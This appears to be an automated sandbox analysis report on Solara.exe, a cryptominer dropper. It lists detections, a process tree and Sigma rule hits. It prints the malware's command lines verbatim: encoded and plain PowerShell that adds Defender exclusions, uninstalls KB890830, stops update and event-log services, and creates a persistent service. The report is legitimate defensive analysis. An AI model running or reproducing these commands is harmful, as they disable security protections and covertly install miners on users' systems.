Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Solara.exe

Overview

General Information

Sample name:Solara.exe
Analysis ID:1585410
MD5:a6bf6970741f337bcb700166165c1f30
SHA1:f90ace8f03e2b76e243d539c8570d157f658d025
SHA256:139c41c5638d344cf6a0f8fb38c61b3f657544b01dd95daff62d0e4b8ff908a1
Tags:CoinMinerexeuser-aachum
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop EventLog
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Encrypted powershell cmdline option found
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • Solara.exe (PID: 2824 cmdline: "C:\Users\user\Desktop\Solara.exe" MD5: A6BF6970741F337BCB700166165C1F30)
    • powershell.exe (PID: 7032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • eth.exe (PID: 6392 cmdline: "C:\Users\user\AppData\Local\Temp\eth.exe" MD5: 87C3DD67BFA3009D89F7B45B01D705B8)
      • powershell.exe (PID: 3576 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 7852 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 7740 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7936 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8052 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8144 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7320 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 5236 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • sc.exe (PID: 2072 cmdline: C:\Windows\system32\sc.exe delete "ARIBLEUL" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7572 cmdline: C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7852 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7860 cmdline: C:\Windows\system32\sc.exe start "ARIBLEUL" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xmr.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Local\Temp\xmr.exe" MD5: 154202154E41175E801A698CA940EB0C)
      • powershell.exe (PID: 6352 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7724 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 7908 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 7732 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7916 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8016 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8096 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8164 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 2700 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
        • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • sc.exe (PID: 5280 cmdline: C:\Windows\system32\sc.exe delete "ARIBLEUL" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7484 cmdline: C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7192 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7440 cmdline: C:\Windows\system32\sc.exe start "ARIBLEUL" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Solara Bootstrapper.exe (PID: 3788 cmdline: "C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe" MD5: 00A1864355A5EA47902E5757C0D87FD9)
      • powershell.exe (PID: 6728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • kx new.exe (PID: 5032 cmdline: "C:\Users\user\AppData\Local\Temp\kx new.exe" MD5: D9D13FA25E880665FB471A4BE57C494C)
        • powershell.exe (PID: 3808 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 2752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Kawpow new.exe (PID: 7304 cmdline: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" MD5: FB6A3B436E9F9402937D95F755B62F91)
          • powershell.exe (PID: 7332 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • xmr new.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Local\Temp\xmr new.exe" MD5: 7D6398EBFB82A24748617189BF4AD691)
          • powershell.exe (PID: 7508 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5604 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • wusa.exe (PID: 432 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
          • sc.exe (PID: 7644 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 5852 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 6596 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 7808 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SolaraBootstrapper.exe (PID: 1292 cmdline: "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" MD5: 6557BD5240397F026E675AFB78544A26)
        • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • lrgkmixyjzta.exe (PID: 7828 cmdline: C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe MD5: 87C3DD67BFA3009D89F7B45B01D705B8)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 2824, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", ProcessId: 7032, ProcessName: powershell.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\eth.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\eth.exe, ParentProcessId: 6392, ParentProcessName: eth.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3576, ProcessName: powershell.exe
Sigma detected: Suspicious Execution of Powershell with Base64
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 2824, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", ProcessId: 7032, ProcessName: powershell.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\xmr.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\xmr.exe, ParentProcessId: 6024, ParentProcessName: xmr.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto", ProcessId: 7484, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 2824, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", ProcessId: 7032, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

barindex
Sigma detected: Stop EventLog
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\xmr.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\xmr.exe, ParentProcessId: 6024, ParentProcessName: xmr.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7192, ProcessName: sc.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-07T16:05:20.422524+010028033053Unknown Traffic192.168.2.549706140.82.121.4443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Solara.exeAvira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeAvira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\kx new.exeAvira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exeReversingLabs: Detection: 68%
Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\eth.exeReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\kx new.exeReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\xmr.exeReversingLabs: Detection: 76%
Multi AV Scanner detection for submitted file
Source: Solara.exeReversingLabs: Detection: 68%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\kx new.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: Solara.exeJoe Sandbox ML: detected
Source: Solara.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
